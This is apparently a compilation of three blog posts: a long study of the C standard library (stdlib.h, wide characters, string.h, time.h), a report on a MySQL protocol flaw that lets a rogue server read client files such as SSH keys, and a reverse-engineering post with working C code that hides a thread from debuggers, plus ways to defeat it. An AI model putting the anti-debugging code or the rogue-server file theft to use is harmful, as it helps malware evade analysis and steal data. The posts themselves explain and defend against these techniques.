Stdlib contains the EXIT_FAILURE and EXIT_SUCCESS macros, whose implementation-defined integer values indicate failure or success on exit. These values would be returned by main or passed to exit(). The C standard actually treats return 0 in main or exit(0) specially, and maps it to whatever the system-specific success code is. (This is similar to how 0 in a pointer context is treated specially as the null pointer, as we talked about earlier.) Thus you don't need to include stdlib.h just to return successfully. EXIT_FAILURE is necessary for portably indicating failure, though: the raw value 1 is considered successful on some platforms.

Speaking of exit(), it causes "normal" termination. It calls any handlers registered by atexit() in reverse order of their registration, flushes and closes all open streams, and deletes files created by tmpfile(). The abort() function, on the other hand, causes immediate and "abnormal" termination. It needn't flush buffers, close open streams, or remove temporary files. It can be averted only by catching SIGABRT with a handler that does not return (for instance, one that calls longjmp). Aborting can be useful because it will cause a core dump if the OS is configured to save one. Thus the assert() macro calls abort() to produce a core file for debugging an assertion failure.

Stdlib.h provides the system() function to run a command in the shell. If the command is a NULL pointer, system() returns nonzero if a command interpreter is available, and zero if it is not. The CERT standard says system() is a security violation and flatly says not to call it. It's easy to make a mistake with system(). Commands that are not fully pathed can be overridden, and even relative paths can be tricky if the attacker can control the current directory. And of course unsanitized input can attack through the shell. CERT suggests using execve() in POSIX to call fully pathed executables.
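The exit() rules in this subsection can be seen in a minimal sketch, assuming a hosted implementation; the handler names and register_exit_handlers() are hypothetical. It registers two handlers with atexit(), which returns zero on success, and reports the outcome with the portable EXIT_SUCCESS and EXIT_FAILURE macros.

```c
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical handlers. atexit() runs them in reverse order of
   registration, so the second one prints before the first. */
static void first_handler(void)
{
	puts("first handler (registered first, runs last)");
}

static void second_handler(void)
{
	puts("second handler (registered second, runs first)");
}

/* Returns EXIT_SUCCESS if both registrations succeed, else EXIT_FAILURE. */
int register_exit_handlers(void)
{
	if (atexit(first_handler) != 0 || atexit(second_handler) != 0)
		return EXIT_FAILURE;
	return EXIT_SUCCESS;
}
```

Calling register_exit_handlers() from main and then returning (or calling exit()) prints the second handler's line before the first. Calling abort() instead would run neither handler.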
(stdlib.h) wchar_t

OK, this is going to get complicated. The takeaway is that the C standard library cannot portably handle Unicode. You'll need a good third-party library. Let's see why.

Before locales and all that, C was designed for 7-bit ASCII text. The committee endorsed the use of locales to specify a codepage that reassigned the meaning of extra characters using all eight bits (the minimum allowed size of char). However, some languages use more than 255 symbols (+ NUL). There were two ways to handle bigger alphabets: use bigger chunks of memory to hold each character code, or define special sequences of single-byte characters to stand for extended characters. These approaches are called "wide characters" and "multibyte characters."

Because networking equipment and disk storage are byte oriented, programs generally use a multibyte character encoding for storage and for communication with the outside world. For in-memory use, however, people felt that wide characters would be cleaner, because each cell in an array would map to exactly one character, like in the old ASCII string days.

The C89 standard is not very helpful with multibyte or wide character encoding. It merely set the stage with a wchar_t type for wide characters, and functions in stdlib.h to convert multibyte strings to wchar_t (mbstowcs) and back (wcstombs) based on the locale. The committee was waiting to see how people wanted to work with international characters before standardizing more. K&R 2nd edition does not list these functions, but Plauger and the C89 spec have them.

The whole idea was that locale-specific multibyte-to-wide-character conversion was supposed to be more general than any particular encoding system. However, Unicode has since proven more popular than the other encodings. The multibyte UTF-8 encoding is the standard interchange format on the web, and the UCS-4 character set is up to the task of handling all the world's languages and then some. Should be no problem, right?
Well, at the time C99 was being standardized, the Unicode consortium (actually the contemporaneous European ISO committee) was endorsing the more limited Universal Coded Character Set UCS-2. The codepoints of UCS-2 are 16 bits, so 16 bits looked like a sufficient width for wchar_t. Sadly, the committee made its decision shortly before four-byte UCS-4 was proposed (ISO 10646).

Vendors like Microsoft jumped into Unicode right away and implemented wchar_t as 16 bits. It's deep in their APIs, and they're now stuck with that size for backward compatibility. Mac OS and iOS use a 32-bit wchar_t, but their native string APIs (NSString, CFString) are still built on 16-bit UTF-16 code units.

UTF-16 combines the worst of multibyte characters and wide characters:

a) Characters outside the Basic Multilingual Plane require two UTF-16 code units (called a surrogate pair) to represent them. This breaks the one-character-one-code-unit assumption.
b) It's wasteful of memory, because even ASCII characters take two bytes.

C99 provides wide character versions of the ctype functions in <wctype.h>, but they simply cannot work properly with surrogate pairs. For example (as pointed out here):

- 0xD800 0xDF1E = U+1031E is a letter (iswalpha should be true)
- 0xD800 0xDF20 = U+10320 is not a letter (iswalpha should be false)
- 0xD834 0xDF1E = U+1D31E is not a letter (iswalpha should be false)
- 0xD834 0xDF20 = U+1D320 is not a letter (iswalpha should be false)
- 0xD835 0xDF1E = U+1D71E is a letter (iswalpha should be true)
- 0xD835 0xDF20 = U+1D720 is a letter (iswalpha should be true)

Neither the first nor the second element of the pair alone can predict whether the resulting Unicode character is alphabetic. There is no way that a system can provide this information through a function iswalpha that takes a single wchar_t argument.

C99 does guarantee that a macro will be defined when the current environment is ISO 10646 compliant, meaning wchar_t can hold every UCS-4 codepoint.
We can blow up for the other platforms:

    #ifndef __STDC_ISO_10646__
    #error "Your wide characters suck."
    #endif

Even assuming we restrict the code to ISO 10646 systems only, the wctype functions are too crude to deal with the subtleties of international languages. Because of how Unicode characters can combine, it's infeasible to use pointer arithmetic to calculate "string length" or to parse "words" robustly with iswspace().

Some parts of programs can continue to operate on text as an opaque series of bytes. However, for parts that must inspect the characters themselves, you should use a sophisticated Unicode library like ICU or utf8proc. This has the advantage of working with C89, so you won't be forced to upgrade to C99 just for text processing.

With a good Unicode library we don't need wide characters. We can use UTF-8 everywhere, even in program memory. That's the school of thought behind utf8everywhere.org.

(stdlib.h) lessons from the code

While reading Plauger's implementation of stdlib, I noticed some tricks worth sharing. The comma operator can be used to group multiple small assignments under an if statement without needing to add curly braces.

    if (condition)
        foo = 1, bar = 2;

Also, an if statement with an empty body can be used to avoid negating one condition when combining it with a big expression in another if statement:

    if (cond)
        ;
    else if (big cond)
        foo;

C89 allows bare blocks inside a function to segregate variable declarations near the code that uses them. The variables are not accessible outside the block. It can help readability to know when variables are no longer needed, although you might argue that it suggests the function as a whole is too big.
    #include <stdio.h>

    int main(void)
    {
        puts("Hello.");

        {
            int i = 0;
            printf("%d\n", i);
        }

        /* error: use of undeclared identifier 'i' */
        printf("%d\n", i);
    }

Speaking of braces, Plauger uses Whitesmiths style indentation, with braces indented to the level of their code:

    if (cond)
        {
        foo();
        while (cond)
            {
            bar();
            baz();
            }
        }

I find it difficult to read (probably just unfamiliar), but it does have an internal consistency. The braces wrap multiple statements into a single unit, and this unit is indented the same way a single statement would be. I'm still not going to indent this way, but just saying.

Another interesting trick is negating an unsigned number. Plauger does that to consolidate code for signed and unsigned numbers in the same function.

    unsigned long _Stoul(const char *, char **, int);
    #define atoi(s) (int)_Stoul(s, NULL, 10)
    #define atol(s) (long)_Stoul(s, NULL, 10)
    #define strtoul(s, endptr, base) _Stoul(s, endptr, base)

This _Stoul() function negates its unsigned long value if the string it is parsing has a negative sign. Unsigned negation is well defined (it wraps modulo 2^N), and on two's-complement machines it yields the same bits as signed negation, so after the cast in atoi and atol the result will be negative as expected. (Converting an out-of-range unsigned value to a signed type is implementation-defined, which the library's own implementer can rely on.) I didn't know it was "allowed," but C doesn't care.

string.h

This header is divided between functions starting with str- and those starting with mem-. The former work with NUL-terminated strings, and the latter with explicit lengths. Some of the str- functions have a modifier to limit length (strncat, strncmp, strncpy) or to work backward (strrchr). However, the header doesn't have all permutations; for instance, there is no strnlen or memrchr.

Why does strchr take an int rather than a char for its search character? Same with memset: it takes an int value but converts it to unsigned char internally. The spec dictates this in section 7.21.6.1.
That misleading int signature is for backward compatibility with pre-ANSI code, which lacked function prototypes and promoted char arguments to int. Under the default argument promotions, any integral type narrower than int converts to int (or to unsigned int if int cannot represent all of its values). All standard library functions are specified in terms of the "widened" types; it's just that string.h contains many functions where this is especially apparent.

The widened types ensure that most library functions can be called with or without a prototype in scope. Legacy code doesn't use prototypes, and ANSI C did not want to break backward compatibility. Even if people were willing to update all the legacy code, any legacy modules distributed as compiled object files rather than source would not link properly against functions with changed argument types.

Similar rationale lies behind the standard's guarantee that char pointers and void pointers share the same representation and alignment requirements. Relying on this guarantee allows old code to work with the void * malloc in place of the original char * malloc. (See the C99 Rationale section 7.1.4, Use of Library Functions.)

We're not done with the type mysteries in string.h. Why is it that strchr converts its int argument to char internally, while memchr converts to unsigned char? Given that strchr searches through a char *, it makes sense to match the type. But memchr searches through a void *. Why not compare each memory location with char rather than unsigned char?

It turns out that the C standard makes special guarantees about unsigned char that make it an ideal type for representing arbitrary binary data.

Unsigned char is guaranteed to have no padding bits: all bits contribute to the value of the data. Other types on some architectures include things like parity bits, which don't affect the value itself but do use space.
No bitwise operation starting from an unsigned char value, when converted back into that type, can produce overflow, trap representations, or undefined behavior. It can be freely manipulated. Trap representations are certain bit patterns reserved for exceptional circumstances, like the NaN value in floating point numbers.

Accessing parts of a larger data object with an unsigned char pointer will not violate any "aliasing rules." The unsigned char pointer is guaranteed to see all modifications of the data object.

In "Portable C," Rabinowitz says the char type has a few distinct uses: codeset characters, units of storage, small numbers, and small bit patterns. He recommends plain char for codeset characters and small numbers, and unsigned char for the others. (In C99 wchar_t might be considered the proper way to represent codeset characters, but we've already seen the difficulty there.)

Note that Rabinowitz doesn't specify signed char and unsigned char, but rather plain char and unsigned char. That's because C does not specify whether plain char is signed or unsigned. And since plain char, signed char, and unsigned char are distinct types, passing a definitively signed char * to a function in string.h draws a warning.

The next functions that taught me something are memcpy and memmove. The first blasts bytes from one part of memory to another, possibly taking advantage of machine instructions to do large block copies. It doesn't check for overlap between the source and destination; if they overlap, the behavior is undefined. C99 marks the source and destination pointers with the restrict qualifier to allow the compiler to optimize under that assumption.

Memmove is the slower, more careful sibling. It works correctly even if the source and destination areas overlap. It is specified to act as if the source memory is first copied to a separate buffer, then copied into the destination.
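For comparison, here is a literal reading of that "as if" wording: copy the source into a temporary buffer, then copy the buffer into the destination. This is a hypothetical sketch (buffered_memmove is not a standard name), and unlike the real memmove it can fail, so it returns NULL when malloc cannot provide the buffer. Both memcpy calls are safe because a freshly allocated buffer never overlaps either argument.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical memmove that follows the specification literally:
   source -> temporary buffer -> destination. Returns d on success,
   or NULL if the temporary buffer cannot be allocated. */
void *buffered_memmove(void *d, const void *s, size_t n)
{
	unsigned char *tmp;

	if (n == 0)
		return d;
	tmp = malloc(n);
	if (tmp == NULL)
		return NULL;
	memcpy(tmp, s, n);   /* tmp is fresh memory, so no overlap with s */
	memcpy(d, tmp, n);   /* and no overlap with d either */
	free(tmp);
	return d;
}
```

The cost is an allocation and a second pass over the data on every call, which is exactly what an in-place approach avoids.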
When I tried writing it, that is exactly what I did, but Plauger has a faster way:

    void *(memmove)(void *d, const void *s, size_t n)
    {
        unsigned char *ds = d;
        const unsigned char *ss = s;

        if (ss > ds)
            /* source lies after destination: copy left to right */
            while (n-- > 0)
                *ds++ = *ss++;
        else
            /* source lies at or before destination: copy right to left,
               pre-decrementing from one past the end of each area */
            for (ss += n, ds += n; 0 < n; --n)
                *--ds = *--ss;
        return d;
    }

This compares the pointer positions to see which occurs first in memory, then copies left to right or right to left accordingly. This is very fast and uses no extra space.

However, isn't comparing arbitrary pointers undefined behavior? C allows you to compare pointers within the same primary data object (like the addresses of different cells in the same array), but not any random pointers. Objects could be in different segments of a segmented memory architecture, or even in totally different memory banks, as in a Harvard architecture. But why would you call memmove when copying one data object into a totally different one? There would be no danger that they overlap, unless you are copying too many bytes, which is already its own big problem. Thus we can assume that the pointers passed to memmove are in the same data object and therefore comparable.

What this also tells me is not to use memmove indiscriminately in order to be "safe," because some implementations like Plauger's would then cause undefined behavior.

One other thing to note about the memmove implementation is that it uses unsigned char pointers to do the work rather than void pointers. Doing pointer arithmetic on void * is a GNU extension not permitted in portable C.

One nice property of returning the destination address from the string.h functions is that they can be chained together:

    if (strcmp(strncat(strcpy(s, "abcde"), "fg", 1), "abcdef")) ...;

Those are the notes I wanted to share for this header. Also, C99 introduces wide character versions of these functions in wchar.h.

time.h

First, the C standard is very lenient about this header.
It has functions to do all kinds of conversions, but the bigger picture is that implementations are allowed to make their "best approximation" to the date and time. Some of them might do a bad job and yet still conform to the standard.

Many C environments do not support the concepts of daylight savings or time zones. Both notions are defined geographically and politically, and thus may require more knowledge about the real world than an implementation can support.

There are a lot of details in this header that I don't want to regurgitate, but it is useful to see how the functions convert between the data types. I made a graph to make it clearer.

One thing I didn't know was that the header provides a clock() function to measure the processor time used by the program since it started. I also didn't know that its resolution, CLOCKS_PER_SEC ticks per second, is often finer than one second. The rest of the library offers no precision finer than one second.

Source: https://begriffs.com/posts/2019-01-19-inside-c-standard-lib.html
  23. MySQL client allows MySQL server to request any local file

Sunday January 20, 2019 in Security, Magecart

This week I discovered that large ecommerce and government sites got hacked via the Adminer database tool. As it turns out, the root cause is a protocol flaw in MySQL. Curiously, it is described in the official documentation, which says:

The transfer of the file from the client host to the server host is initiated by the MySQL server. In theory, a patched server could be built that would tell the client program to transfer a file of the server's choosing rather than the file named by the client in the LOAD DATA statement. Such a server could access any file on the client host to which the client user has read access. (A patched server could in fact reply with a file-transfer request to any statement, not just LOAD DATA LOCAL, so a more fundamental issue is that clients should not connect to untrusted servers.)

"In theory"? An Evil MySQL Server that does exactly that can be found on GitHub, and was likely used to exfiltrate passwords from these hacked sites. It could also be used to steal SSH keys and crypto wallets, as interfail points out.

The server has to know the full path of the file on the client for this to succeed. However, by first requesting /proc/self/environ, the server can learn a great deal about the folder structure on the client.

Several clients and libraries have built-in protection against this "feature", or disable it by default (e.g. Golang, Python, PHP-PDO). But not all do, as the Adminer case demonstrates. And Adminer probably won't be the last.

Yours truly: digital forensics consultant, tracking payment skimmers since 2015. I am also the founder of the e-commerce malware scanner and Magereport. If you are breached and need a solid cleanup & root cause analysis, do get in touch.

Source: https://gwillem.gitlab.io/2019/01/20/sites-hacked-via-mysql-protocal-flaw/
  24. Anti Debugging Tricks #4 – Hidden Threads

timb3r - reverse engineering, January 19, 2019

Has this ever happened to you? You're playing around with some application and it crashes the moment you attach a debugger? Ever wondered why or how? I do. These types of questions keep me awake at night.

I first became aware of this technique while cruising around some forums on the internet, where people were typically asking for a bypass or a method to work around it. But I was more interested in HOW this technique works than in how to bypass it.

During my research phase I noticed that the application would crash with:

    Unhandled exception code 80000003

But that's an int 3 exception? How is the debugger not catching that? What the actual hell.

Searching around for information, I discovered that NtSetInformationThread takes a THREADINFOCLASS parameter, whose values include this interesting one:

    ThreadHideFromDebugger = 0x11

Why Hans?

You may be wondering why this is even a "feature" of Windows. Wouldn't malware abuse the hell out of this? Yes, probably. But here's why it exists: when you attach a debugger to a remote process, a new thread is created. If this were just a normal thread, the debugger would be caught in an endless loop as it attempted to stop its own execution. So behind the scenes, when the debugging thread is created, Windows calls NtSetInformationThread with the ThreadHideFromDebugger flag set (1). This way the process can be debugged, a deadlock is prevented, and code execution continues as normal.

However, once a thread is hidden from the debugger, any breakpoints or exceptions triggered in it will cause the process to crash: because the debugger cannot see the thread, it is unable to trap these events.
So as it turned out, some devious individual noticed this odd behaviour and thought: "this would make a really cool anti-debug feature". Now this method is widespread enough for me to be aware of it.

Das Kode

So what does it actually look like in code? I wasn't able to find any live examples, so I constructed my own based on how I thought it should work:

    #include <stdio.h>
    #include <windows.h>

    /* Only the value we need; typedef'd so the name works as a type in C. */
    typedef enum { ThreadHideFromDebugger = 0x11 } THREADINFOCLASS;

    typedef NTSTATUS (WINAPI *NtQueryInformationThread_t)(HANDLE, THREADINFOCLASS, PVOID, ULONG, PULONG);
    typedef NTSTATUS (WINAPI *NtSetInformationThread_t)(HANDLE, THREADINFOCLASS, PVOID, ULONG);

    NtQueryInformationThread_t fnNtQueryInformationThread = NULL;
    NtSetInformationThread_t fnNtSetInformationThread = NULL;

    DWORD WINAPI ThreadMain(LPVOID p)
    {
        (void)p;
        while (1)
        {
            /* This can be any trigger; IsDebuggerPresent() is for demo purposes */
            if (IsDebuggerPresent())
                __asm__("int3");   /* GCC/MinGW syntax; on MSVC use __debugbreak() */
            Sleep(500);
        }
        return 0;
    }

    int main(void)
    {
        DWORD dwThreadId = 0;
        HANDLE hThread = CreateThread(NULL, 0, ThreadMain, NULL, 0, &dwThreadId);
        HMODULE hDLL = LoadLibraryA("ntdll.dll");
        ULONG lHideThread = 1, lRet = 0;

        if (!hThread || !hDLL)
            return -1;

        fnNtQueryInformationThread = (NtQueryInformationThread_t)GetProcAddress(hDLL, "NtQueryInformationThread");
        fnNtSetInformationThread = (NtSetInformationThread_t)GetProcAddress(hDLL, "NtSetInformationThread");
        if (!fnNtQueryInformationThread || !fnNtSetInformationThread)
            return -1;

        /* Hide the worker thread from any debugger */
        fnNtSetInformationThread(hThread, ThreadHideFromDebugger, &lHideThread, sizeof(lHideThread));

        /* Read the flag back; reset first so the output reflects the query */
        lHideThread = 0;
        fnNtQueryInformationThread(hThread, ThreadHideFromDebugger, &lHideThread, sizeof(lHideThread), &lRet);
        printf("Thread is hidden: %s\n", lHideThread ? "Yes" : "No");

        WaitForSingleObject(hThread, INFINITE);
        return 0;
    }

Pretty simple, yes?
Now if you run the program and attempt to attach a debugger, you'll get this interesting crash:

    0036:err:seh:raise_exception Unhandled exception code 80000003 flags 0 addr 0x401566

Oh ho ho!

Throwing Hans off Nakatomi

Now that we've established how this works, we can look at beating it. There are a number of ways, including:

- Hooking the required Nt function calls.
- Replacing the int 3 instruction with a nop.
- Nopping or hooking the "trigger" function.

I opted for nopping out the int 3. You can use your tool of choice to locate the required int 3 instruction; you'll have to search around a bit. Once you've found our thread with the check, you can nop that sucka out. Attaching a debugger and resuming execution will then result in everything working as expected.

Bye Hans

Source: https://gamephreakers.com/2019/01/anti-debugging-tricks-4-hidden-threads/